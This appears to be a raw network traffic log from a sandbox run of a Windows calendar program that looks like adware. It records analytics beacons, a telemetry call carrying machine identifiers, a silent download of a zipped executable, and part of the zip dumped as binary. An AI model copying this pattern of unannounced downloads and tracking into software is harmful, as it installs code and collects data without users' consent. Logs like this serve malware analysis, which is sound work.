id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/
" c ".gif",p="<a href='" q "' target=_blank title='" j "'><im
g border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href
='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon(
[p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/
javascript..Content-Length: 750..Connection: keep-alive..Date: Wed, 14
 Jan 2015 11:37:40 GMT..Last-Modified: Wed, 14 Jan 2015 11:37:40 GMT..
Expires: Wed, 14 Jan 2015 11:52:40 GMT..Age: 816..X-Cache: HIT TCP_MEM
_HIT dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:40 GMT..X-Sw
ift-CacheTime: 900..Via: cache1.de1[0,200-0,H], cache5.de1[0,0]..!func
tion(){var p,q,r,a=encodeURIComponent,b="30085361",c="3",d="",e="onlin
e_v3.php",f="q5.cnzz.com",g="1",h="text",i="q",j="全景 
479;计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l 
"//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.pu
sh("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.cal
<<< skipped >>>

GET /core.php?web_id=5554906&t=z HTTP/1.1


Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 751
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:37:54 GMT
Last-Modified: Wed, 14 Jan 2015 11:37:54 GMT
Expires: Wed, 14 Jan 2015 11:52:54 GMT
Age: 812
X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:54 GMT
X-Swift-CacheTime: 900
Via: cache1.de1[0,200-0,H], cache5.de1[0,0]
!function(){var p,q,r,a=encodeURIComponent,b="5554906",c="",d="",e="on
line_v3.php",f="hzs14.cnzz.com",g="1",h="text",i="z",j="站໳
1;统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1
",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f
),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.c
allRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScr
iptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web
_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img
/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><i
mg border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a hre
f='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon
([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application
/javascript..Content-Length: 751..Connection: keep-alive..Date: Wed, 1
4 Jan 2015 11:37:54 GMT..Last-Modified: Wed, 14 Jan 2015 11:37:54 GMT.
.Expires: Wed, 14 Jan 2015 11:52:54 GMT..Age: 812..X-Cache: HIT TCP_ME
M_HIT dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:54 GMT..X-S
wift-CacheTime: 900..Via: cache1.de1[0,200-0,H], cache5.de1[0,0]..!fun
ction(){var p,q,r,a=encodeURIComponent,b="5554906",c="",d="",e="online
_v3.php",f="hzs14.cnzz.com",g="1",h="text",i="z",j="站长&#
32479;计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=
l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.
push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.c
<<< skipped >>>


GET / HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:23 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Cache-Control: private
Cxy_all: baidu 3d02aa32ed472b1d9368b0a1d258b1a7
Expires: Wed, 14 Jan 2015 11:51:19 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xe4a43e4c0000c927
BDUSERID: 0
1506e..<!DOCTYPE html><!--STATUS OK--><html><head
><meta http-equiv="content-type" content="text/html;charset=utf-
8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><m
eta content="always" name="referrer"><link rel="dns-prefetch" hr
ef="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baid
u.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><l
ink rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-pre
fetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//
t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/
><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title
>...........................</title>.<style index="index" 
 id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper
{position:relative;_position:;min-height:100%}#head{padding-bottom:100
px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;
bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overf
low:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text
-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-styl
e:none}body,form,#fm{position:relative}td{text-align:left}img{border:0
}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.b
dstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);backgrou
nd-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www
/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{
<<< skipped >>>

GET / HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0


HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 8283a456f4f2fcbe7d033a319ebdf652
Expires: Wed, 14 Jan 2015 11:51:13 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xf3ae7d2f0000d9ed
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
1509e..<!DOCTYPE html><!--STATUS OK--><html><head
><meta http-equiv="content-type" content="text/html;charset=utf-
8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><m
eta content="always" name="referrer"><link rel="dns-prefetch" hr
ef="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baid
u.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><l
ink rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-pre
fetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//
t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/
><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title
>...........................</title>.<style index="index" 
 id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper
{position:relative;_position:;min-height:100%}#head{padding-bottom:100
px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;
bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overf
low:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text
-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-styl
e:none}body,form,#fm{position:relative}td{text-align:left}img{border:0
}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.b
dstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);backgrou
nd-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www
/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{
<<< skipped >>>

GET / HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0


HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 1a71cd95de14792ccc45de0b785c53dc
Expires: Wed, 14 Jan 2015 11:50:53 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xd6212c900000d9aa
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
15152..<!DOCTYPE html><!--STATUS OK--><html><head
><meta http-equiv="content-type" content="text/html;charset=utf-
8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><m
eta content="always" name="referrer"><link rel="dns-prefetch" hr
ef="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baid
u.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><l
ink rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-pre
fetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//
t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/
><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title
>...........................</title>.<style index="index" 
 id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper
{position:relative;_position:;min-height:100%}#head{padding-bottom:100
px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;
bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overf
low:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text
-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-styl
e:none}body,form,#fm{position:relative}td{text-align:left}img{border:0
}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.b
dstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);backgrou
nd-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www
/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{
<<< skipped >>>

GET / HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0


HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 082df6cf533022a4274251c69fa2738d
Expires: Wed, 14 Jan 2015 11:50:52 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xb6b4c2b20000cfbf
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
1514c..<!DOCTYPE html><!--STATUS OK--><html><head
><meta http-equiv="content-type" content="text/html;charset=utf-
8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><m
eta content="always" name="referrer"><link rel="dns-prefetch" hr
ef="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baid
u.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><l
ink rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-pre
fetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//
t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/
><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title
>...........................</title>.<style index="index" 
 id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper
{position:relative;_position:;min-height:100%}#head{padding-bottom:100
px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;
bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overf
low:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text
-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-styl
e:none}body,form,#fm{position:relative}td{text-align:left}img{border:0
}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.b
dstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);backgrou
nd-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www
/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{
<<< skipped >>>

GET / HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0


HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:52 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 7b032a5b300d7008530b99d911ef79b0
Expires: Wed, 14 Jan 2015 11:51:18 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xd16108b60000ef4e
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
1514f..<!DOCTYPE html><!--STATUS OK--><html><head
><meta http-equiv="content-type" content="text/html;charset=utf-
8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><m
eta content="always" name="referrer"><link rel="dns-prefetch" hr
ef="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baid
u.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><l
ink rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-pre
fetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//
t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/
><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title
>...........................</title>.<style index="index" 
 id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper
{position:relative;_position:;min-height:100%}#head{padding-bottom:100
px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;
bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overf
low:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text
-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-styl
e:none}body,form,#fm{position:relative}td{text-align:left}img{border:0
}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.b
dstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);backgrou
nd-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www
/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{
<<< skipped >>>


GET /stat.htm?id=30085361&r=&lg=en-us&ntime=none&cnzz_eid=162298059-1421232891-&showp=1276x846&t=&h=1&rnd=942284497 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hqs5.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 14 Jan 2015 11:51:23 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..



GET /files/conn_engine/2.69.0.5490.zip HTTP/1.1
Range: bytes=0-
User-Agent: WDJConnEngine
Cache-Control: no-cache
Connection: Keep-Alive
Host: fw1.dl.wdjcdn.com


HTTP/1.1 206 Partial Content
Date: Wed, 14 Jan 2015 11:51:37 GMT
Expires: Fri, 13 Feb 2015 11:51:37 GMT
Content-Length: 3383964
Content-Range: bytes 0-3383963/3383964
Content-Type: application/zip
Last-Modified: Thu, 16 Jan 2014 03:30:19 GMT
Cache-Control: max-age=2592000
Connection: Keep-Alive
Server: Tengine/1.4.6
Accept-Ranges: bytes
Fw-Via: DISK HIT from ctl-ha-091-042.fcd, DISK HIT from CTL_JS_002_039.fcd, DISK HIT from CTL_ZJ_146_221.fcd, DISK HIT from CTL_JS_002_040.fcd
PK.........[0D.mg.....x.......wdjconx64.exe.....U.(|.....'`uH.n^....8@
t..........#6!.M...d&LpH:..6..5.$.:J#.9..Z...,..";.........V....n..GD.
..4....s.._z2a.......IM..u....{..s.}...(....c..&A..0......?.w*<....
I...G7.o....w\?..Q....}....O...]..].~....;z..y.).eN...L...y..G....3.|.
.....Gn...y........Gn...?...c?..|.....m..:.................*..mAx.?|Z|
.[..h......2......k.dF...2...P...|.jxR.p..y.<.aH..'.{....$.Gj.4|.I=
....'C. ..]......>W}.....i.._g.....eA.Dc.:3M]....5....-.....[...e..
#.......)..N.d.z...7.kp....C...>.?...1......w...t.o..J&(...>....
0....>..!....n...,...k?g.;.|.......L|...z.\...S..8\..W..yG.g..%.~.Y
..........zW........py.r#....T_...k.>...]..........1..1....p..q..m\
.Y...c...~;.X..a.S.u..!.{W...............{..>.i[..vo.......`c.]XB..
.>....|.|.i.....>....#..=....cjc......U.....{...|..x..9.:.b|...n
....5&./...;..,.m,..q..[..,........m.........k..b.:....}.^...q{c.V....
..[..?..XNT......?.X.[...#Vz.90?.z....:....w.U..Y...i.W..hG...........
..-..Vhl...5|W......vS.........wm.M.do...i...]...?....2.n.w.S.J......9
...../.>.7..2.M...(Q.....,.n;............./j...g..7.........?.M.7\.
}.....mg...%..'......T..w....Q.....O.}a.k.H......`Z.!....-.l..@JJ...].
BB?..#.q..b.l ..PF.Q...}......a.......;.3*........1.e.......7.....F.e.
.F....0..,.`...................%...G.Y|............=..2.X..P.?..$4HK#.
..F..E^..8...,.!0.m.....Q.{y..I...qi$.y....o.p.:n_..z.ji.....(...G7#&l
t;.xL..Ah#..'N.....T.j..........$.8.}.......;.!5y.s$-X.....|....*=S.^[
'....'....8..c..!...j........<...........[.......6...|<?./.g
<<< skipped >>>


GET /metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=adslist&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno= HTTP/1.0
Host: count.xiaoxinrili.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: AppName:........; Compiled:201412311429; WinVer:5.01.2600 paX86; AdapterCount:1;


HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=ho6eqvah97serbkjg5p59n79h1; expires=Wed, 14-Jan-2015 13:49:45 GMT; path=/; HttpOnly
Set-Cookie: laravel_session=ho6eqvah97serbkjg5p59n79h1; expires=Wed, 14-Jan-2015 13:49:45 GMT; path=/; httponly
Cache-Control: private, must-revalidate
Date: Wed, 14 Jan 2015 11:49:45 GMT
pragma: no-cache
expires: -1
0..



GET /stat.php?id=5614889 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s9.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10072
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:11:31 GMT
Last-Modified: Wed, 14 Jan 2015 11:11:31 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 2424
X-Cache: HIT TCP_MEM_HIT dirn:6:786858085
X-Swift-SaveTime: Wed, 14 Jan 2015 11:11:32 GMT
X-Swift-CacheTime: 5399
Via: cache1.de1[0,200-0,H], cache8.de1[0,0]
(function(){function k(){this.c="5614889";this.R="z";this.N="";this.K=
"";this.M="";this.r="1421233891";this.P="hzs10.cnzz.com";this.L="";thi
s.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" 
this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la(
)}function g(a,b){try{var c=.[];c.push("siteid=5614889");c.push("name=
" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.
push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAge
nt));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.rando
m()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}cat
ch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURICompon
ent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J
(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j()
,this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa()
,e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}
},oa:function(){try{var a=this;e._czc={push:function(){return a.B.appl
y(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e
._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.len
gth;b  ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[ob
ject String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "
_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}
}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof
 e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[
<<< skipped >>>


GET /stat.php?id=5467330&web_id=5467330 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s23.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 10072
Connection: keep-alive
Date: Wed, 14 Jan 2015 10:54:50 GMT
Last-Modified: Wed, 14 Jan 2015 10:54:50 GMT
Cache-Control: max-age=5400,s-maxage=5400
Age: 3386
X-Cache: HIT TCP_MEM_HIT dirn:0:415567230
X-Swift-SaveTime: Wed, 14 Jan 2015 10:54:50 GMT
X-Swift-CacheTime: 5400
Via: cache8.de1[0,200-0,H], cache7.de1[0,0]
(function(){function k(){this.c="5467330";this.R="z";this.N="";this.K=
"";this.M="";this.r="1421232890";this.P="hzs23.cnzz.com";this.L="";thi
s.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" 
this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la(
)}function g(a,b){try{var c=.[];c.push("siteid=5467330");c.push("name=
" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.
push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAge
nt));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.rando
m()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}cat
ch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURICompon
ent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J
(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j()
,this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa()
,e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}
},oa:function(){try{var a=this;e._czc={push:function(){return a.B.appl
y(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e
._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.len
gth;b  ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[ob
ject String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "
_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}
}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof
 e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[
<<< skipped >>>


GET /appImg/appimg.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 20 Mar 2014 02:35:58 GMT
Accept-Ranges: bytes
ETag: "75d4f20e543cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:29 GMT
Content-Length: 0
....


GET /appImg/AppCloud4.2.xml HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 23 Apr 2014 03:16:06 GMT
Accept-Ranges: bytes
ETag: "9bff765da25ecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:30 GMT
Content-Length: 2817
<?xml version="1.0" encoding="gb2312"?>..<root>.. <item
 genre="set" skinurl="" md5="" />.. <item genre="tool" uitype="n
oie_rili" name="...." ui_name="beiwang" app1img="_b" app2imgN="_f1" ap
p2imgS="_f2" app3img="_del" />.. <item genre="tool" uitype="noie
_rili" name="...." ui_name="tixing" app1img="_b" app2imgN="_f1" app2im
gS="_f2" app3img="_del" />.. <item genre="tool" uitype="noie_ril
i" name="...." ui_name="guanji" app1img="_b" app2imgN="_f1" app2imgS="
_f2" app3img="_del" />.. <item genre="arder" uitype="ie" name=".
..." ui_name="yinyue" comline="926,600,0,....,yinyue_rilicla,1,hXXp://
update.redshu.com/daohang/xck.html?1,hXXp://fm.baidu.com/?embed=ps&bd_
user=3590635477&bd_sig=7ecf52d8702148fffdf014bb7cde9c84&canvas_pos=pla
tform" app1img="_b" app2imgN="_f1" app2imgS="_f2" app3img="_del" />
..<item genre="tool" uitype="ie" name="......" ui_name="jisuanqi" c
omline="555,620,0,......,jisuanqi_rilicla,0,hXXp://update.redshu.com/d
aohang/xck.html?6,hXXp://apps2.bdimg.com/store/static/kvt/3e9b470e8b9f
ceaa66d46a935b45518e.swf" app1img="_b" app2imgN="_f1" app2imgS="_f2" a
pp3img="_del" /> .. <item genre="live" uitype="ie" name="...." u
i_name="kuaidi" comline="550,425,0,....,kuaidi_rilicla,0,hXXp://update
